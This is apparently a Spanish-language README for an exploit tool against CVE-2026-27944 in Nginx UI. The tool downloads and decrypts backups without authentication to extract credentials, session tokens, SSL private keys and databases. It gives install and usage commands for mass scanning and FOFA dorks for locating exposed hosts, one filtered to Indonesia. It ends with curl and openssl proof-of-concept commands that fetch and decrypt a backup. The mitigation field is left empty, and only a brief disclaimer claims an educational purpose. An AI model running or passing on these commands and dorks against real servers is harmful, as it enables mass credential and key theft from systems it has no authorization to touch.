
Suka suka lah
🚀 CVE-2026-27944: Exploit de Backup sin Autenticación en Nginx UI
📌 Descripción
27944.py es una herramienta de explotación para CVE-2026-27944 que permite a un atacante descargar y descifrar copias de seguridad de Nginx UI sin autenticación.
Esta vulnerabilidad está presente en Nginx UI versión < 2.3.2 y permite el acceso a:
· Credenciales de usuario y tokens de sesión · Claves privadas SSL · Configuración de Nginx · Archivos de base de datos
🔧 Características
· ✅ Escaneo masivo desde archivo de objetivos · ✅ Explotación de un solo objetivo · ✅ Descarga automática de copia de seguridad · ✅ Descifrado automático AES-256-CBC · ✅ Extracción automática de credenciales de la copia de seguridad
🛠️ Instalación
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt
🚀 Cómo Usar
python 27944.py -f targets.txt -o hasil_scan
python 27944.py -t target.com:9000 --exploit --decrypt
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full
📋 Formato de Objetivos
target1.com:9000
192.168.1.1:9000
target2.com:8080
🎯 Dork FOFA
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"
📂 Resultados de Salida
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
├── app.ini
├── database.db
├── nginx.conf
└── ssl/
⚠️ Aviso Legal
Esta herramienta se crea con fines educativos y de pruebas de seguridad ética. El autor no se hace responsable por el mal uso de esta herramienta. Úsela únicamente en sistemas que posea o para los que tenga autorización por escrito para realizar pruebas.
📝 Explicación Técnica
CVE-2026-27944 es una vulnerabilidad crítica en Nginx UI que permite a un atacante acceder al endpoint /api/backup sin autenticación. La copia de seguridad contiene datos sensibles cifrados con AES-256, pero la clave y el IV se envían a través del encabezado X-Backup-Security en formato Base64.
Puntaje CVSS: 9.8 (Crítico)
Versiones Afectadas: Nginx UI < 2.3.2
Mitigación:
💀 PoC
# Verificar vulnerabilidad
curl -I http://target:9000/api/backup
# Descargar copia de seguridad
curl -s http://target:9000/api/backup -o backup.bin
# Descifrar copia de seguridad (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip